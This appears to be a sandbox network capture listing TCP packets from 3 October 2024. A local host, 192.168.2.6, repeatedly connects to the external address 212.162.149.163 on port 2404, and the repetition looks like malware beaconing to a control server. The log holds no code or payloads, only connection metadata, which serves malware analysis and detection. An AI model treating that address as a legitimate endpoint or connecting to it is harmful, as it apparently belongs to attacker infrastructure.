Oct 3, 2024 09:28:59.825536013 CEST | 2404 | 49744 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:01.345846891 CEST | 2404 | 49744 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:01.345922947 CEST | 49744 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:01.345962048 CEST | 49744 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:01.351175070 CEST | 2404 | 49744 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:02.352811098 CEST | 49745 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:02.358827114 CEST | 2404 | 49745 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:02.358987093 CEST | 49745 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:02.359457016 CEST | 49745 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:02.366189003 CEST | 2404 | 49745 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:03.837276936 CEST | 2404 | 49745 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:03.837353945 CEST | 49745 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:03.837402105 CEST | 49745 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:03.842257977 CEST | 2404 | 49745 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:04.852765083 CEST | 49746 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:05.059768915 CEST | 2404 | 49746 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:05.059855938 CEST | 49746 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:05.060313940 CEST | 49746 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:05.065129042 CEST | 2404 | 49746 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:06.506722927 CEST | 2404 | 49746 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:06.506869078 CEST | 49746 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:06.507081032 CEST | 49746 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:06.511807919 CEST | 2404 | 49746 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:07.509558916 CEST | 49747 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:07.514487028 CEST | 2404 | 49747 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:07.514564037 CEST | 49747 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:07.515007973 CEST | 49747 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:07.519789934 CEST | 2404 | 49747 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:08.974787951 CEST | 2404 | 49747 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:08.978317976 CEST | 49747 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:08.978357077 CEST | 49747 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:08.983300924 CEST | 2404 | 49747 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:09.993755102 CEST | 49748 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:09.999706030 CEST | 2404 | 49748 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:09.999809980 CEST | 49748 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:10.000253916 CEST | 49748 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:10.006433964 CEST | 2404 | 49748 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:11.460206985 CEST | 2404 | 49748 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:11.460347891 CEST | 49748 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:11.460349083 CEST | 49748 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:11.465213060 CEST | 2404 | 49748 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:12.464781046 CEST | 49749 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:12.471335888 CEST | 2404 | 49749 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:12.471405983 CEST | 49749 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:12.471873999 CEST | 49749 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:12.478239059 CEST | 2404 | 49749 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:13.928100109 CEST | 2404 | 49749 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:13.928239107 CEST | 49749 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:13.928260088 CEST | 49749 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:13.933093071 CEST | 2404 | 49749 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:14.930980921 CEST | 49750 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:14.935940027 CEST | 2404 | 49750 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:14.936064959 CEST | 49750 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:14.936734915 CEST | 49750 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:14.941534996 CEST | 2404 | 49750 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:16.397460938 CEST | 2404 | 49750 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:16.397867918 CEST | 49750 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:16.397867918 CEST | 49750 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:16.403067112 CEST | 2404 | 49750 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:17.401936054 CEST | 49751 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:17.406893015 CEST | 2404 | 49751 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:17.407016993 CEST | 49751 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:17.407501936 CEST | 49751 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:17.412322998 CEST | 2404 | 49751 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:19.072071075 CEST | 2404 | 49751 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:19.072143078 CEST | 49751 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:19.072244883 CEST | 49751 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:19.081413031 CEST | 2404 | 49751 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:20.087156057 CEST | 49753 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:20.092029095 CEST | 2404 | 49753 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:20.092123985 CEST | 49753 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:20.092592001 CEST | 49753 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:20.097333908 CEST | 2404 | 49753 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:21.596678972 CEST | 2404 | 49753 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:21.596812963 CEST | 49753 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:21.600440979 CEST | 49753 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:21.605365038 CEST | 2404 | 49753 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:22.640800953 CEST | 49754 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:22.826675892 CEST | 2404 | 49754 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:22.826772928 CEST | 49754 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:22.827305079 CEST | 49754 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:22.832192898 CEST | 2404 | 49754 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:24.311588049 CEST | 2404 | 49754 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:24.311752081 CEST | 49754 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:24.314429045 CEST | 49754 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:24.319231987 CEST | 2404 | 49754 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:25.338396072 CEST | 49755 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:25.343420029 CEST | 2404 | 49755 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:25.343542099 CEST | 49755 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:25.344002008 CEST | 49755 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:25.348766088 CEST | 2404 | 49755 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:26.825653076 CEST | 2404 | 49755 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:26.825773954 CEST | 49755 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:26.825887918 CEST | 49755 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:26.830696106 CEST | 2404 | 49755 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:27.837151051 CEST | 49756 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:27.842506886 CEST | 2404 | 49756 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:27.842612982 CEST | 49756 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:27.843036890 CEST | 49756 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:27.847948074 CEST | 2404 | 49756 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:29.307919979 CEST | 2404 | 49756 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:29.311247110 CEST | 49756 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:29.311300993 CEST | 49756 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:29.316095114 CEST | 2404 | 49756 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:30.321480989 CEST | 49757 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:30.326467991 CEST | 2404 | 49757 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:30.326546907 CEST | 49757 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:30.326917887 CEST | 49757 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:30.331720114 CEST | 2404 | 49757 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:31.812305927 CEST | 2404 | 49757 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:31.812510967 CEST | 49757 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:31.812510967 CEST | 49757 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:31.817519903 CEST | 2404 | 49757 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:32.821536064 CEST | 49758 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:32.826545000 CEST | 2404 | 49758 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:32.828406096 CEST | 49758 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:32.828638077 CEST | 49758 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:32.833453894 CEST | 2404 | 49758 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:34.271598101 CEST | 2404 | 49758 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:34.271743059 CEST | 49758 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:34.271743059 CEST | 49758 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:34.276576042 CEST | 2404 | 49758 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:35.274669886 CEST | 49759 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:35.279691935 CEST | 2404 | 49759 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:35.279779911 CEST | 49759 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:35.280034065 CEST | 49759 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:35.285080910 CEST | 2404 | 49759 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:36.777923107 CEST | 2404 | 49759 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:36.778043032 CEST | 49759 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:36.778079033 CEST | 49759 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:36.782989979 CEST | 2404 | 49759 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:37.790890932 CEST | 49760 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:37.796050072 CEST | 2404 | 49760 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:37.798418999 CEST | 49760 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:37.799854040 CEST | 49760 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:37.804737091 CEST | 2404 | 49760 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:39.278219938 CEST | 2404 | 49760 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:39.278312922 CEST | 49760 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:39.278314114 CEST | 49760 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:39.284480095 CEST | 2404 | 49760 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:40.290293932 CEST | 49761 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:40.301211119 CEST | 2404 | 49761 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:40.301582098 CEST | 49761 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:40.301582098 CEST | 49761 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:40.310427904 CEST | 2404 | 49761 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:41.799120903 CEST | 2404 | 49761 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:41.799194098 CEST | 49761 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:41.799263954 CEST | 49761 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:41.804441929 CEST | 2404 | 49761 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:42.807292938 CEST | 49762 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:42.814102888 CEST | 2404 | 49762 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:42.814222097 CEST | 49762 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:42.814455032 CEST | 49762 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:42.820506096 CEST | 2404 | 49762 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:44.343194962 CEST | 2404 | 49762 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:44.343383074 CEST | 49762 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:44.343383074 CEST | 49762 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:44.349940062 CEST | 2404 | 49762 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:45.352782965 CEST | 49763 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:45.358025074 CEST | 2404 | 49763 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:45.358129025 CEST | 49763 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:45.358366013 CEST | 49763 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:45.363734007 CEST | 2404 | 49763 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:46.836972952 CEST | 2404 | 49763 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:46.837069035 CEST | 49763 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:46.837112904 CEST | 49763 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:46.842207909 CEST | 2404 | 49763 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:47.805905104 CEST | 49764 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:47.811441898 CEST | 2404 | 49764 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:47.811517954 CEST | 49764 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:47.811789989 CEST | 49764 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:47.818888903 CEST | 2404 | 49764 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:49.328649044 CEST | 2404 | 49764 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:49.328718901 CEST | 49764 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:49.328815937 CEST | 49764 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:49.334047079 CEST | 2404 | 49764 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:50.274595022 CEST | 49765 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:50.284570932 CEST | 2404 | 49765 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:50.284657001 CEST | 49765 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:50.284883022 CEST | 49765 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:50.297332048 CEST | 2404 | 49765 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:51.799197912 CEST | 2404 | 49765 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:51.799313068 CEST | 49765 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:51.799354076 CEST | 49765 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:51.805605888 CEST | 2404 | 49765 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:52.712260008 CEST | 49766 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:52.717506886 CEST | 2404 | 49766 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:52.720412970 CEST | 49766 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:52.720676899 CEST | 49766 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:52.726290941 CEST | 2404 | 49766 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:54.201515913 CEST | 2404 | 49766 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:54.201596975 CEST | 49766 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:54.201643944 CEST | 49766 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:54.212065935 CEST | 2404 | 49766 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:55.087141037 CEST | 49767 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:55.092178106 CEST | 2404 | 49767 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:55.092262030 CEST | 49767 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:55.092566013 CEST | 49767 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:55.097520113 CEST | 2404 | 49767 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:56.563097000 CEST | 2404 | 49767 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:56.563153982 CEST | 49767 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:56.563191891 CEST | 49767 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:56.568073034 CEST | 2404 | 49767 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:57.415307045 CEST | 49769 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:57.420327902 CEST | 2404 | 49769 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:57.420562983 CEST | 49769 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:57.420650005 CEST | 49769 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:57.425822020 CEST | 2404 | 49769 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:59.079514027 CEST | 2404 | 49769 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:59.079750061 CEST | 49769 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:59.079750061 CEST | 49769 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:59.093332052 CEST | 2404 | 49769 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:59.899815083 CEST | 49770 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:59.921925068 CEST | 2404 | 49770 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:29:59.923022985 CEST | 49770 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:59.923537970 CEST | 49770 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:29:59.942706108 CEST | 2404 | 49770 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:01.522186041 CEST | 2404 | 49770 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:01.522357941 CEST | 49770 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:01.522411108 CEST | 49770 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:01.527508974 CEST | 2404 | 49770 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:02.322766066 CEST | 49771 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:02.329962015 CEST | 2404 | 49771 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:02.330092907 CEST | 49771 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:02.330483913 CEST | 49771 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:02.335933924 CEST | 2404 | 49771 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:03.839222908 CEST | 2404 | 49771 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:03.839287996 CEST | 49771 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:03.839330912 CEST | 49771 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:03.845767975 CEST | 2404 | 49771 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:04.602873087 CEST | 49772 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:04.608091116 CEST | 2404 | 49772 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:04.608187914 CEST | 49772 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:04.608519077 CEST | 49772 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:04.613842964 CEST | 2404 | 49772 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:06.088255882 CEST | 2404 | 49772 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:06.088340044 CEST | 49772 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:06.088428974 CEST | 49772 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:06.093138933 CEST | 2404 | 49772 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:06.837255955 CEST | 49773 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:06.842341900 CEST | 2404 | 49773 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:06.843293905 CEST | 49773 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:06.843533039 CEST | 49773 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:06.848634958 CEST | 2404 | 49773 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:08.326358080 CEST | 2404 | 49773 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:08.326507092 CEST | 49773 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:08.353390932 CEST | 49773 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:08.358315945 CEST | 2404 | 49773 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:09.071636915 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:09.076855898 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:09.080436945 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:09.080687046 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:09.446202993 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:10.125539064 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:10.125603914 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:10.126512051 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:10.126584053 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:11.715136051 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:11.715353966 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:11.715353966 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.415409088 CEST | 49775 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.741913080 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.760252953 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.760307074 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.760391951 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.760433912 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.760502100 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.760541916 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.762226105 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.762243032 CEST | 2404 | 49775 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.762274981 CEST | 2404 | 49774 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:12.762322903 CEST | 49775 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.762358904 CEST | 49774 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.762607098 CEST | 49775 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:12.770200014 CEST | 2404 | 49775 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:14.263031006 CEST | 2404 | 49775 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:14.263109922 CEST | 49775 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:14.620532990 CEST | 49775 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:14.625551939 CEST | 2404 | 49775 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:15.634557962 CEST | 49776 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:15.639872074 CEST | 2404 | 49776 | 212.162.149.163 | 192.168.2.6
Oct 3, 2024 09:30:15.640032053 CEST | 49776 | 2404 | 192.168.2.6 | 212.162.149.163
Oct 3, 2024 09:30:15.640290976 CEST | 49776 | 2404 | 192.168.2.6 | 212.162.149.163
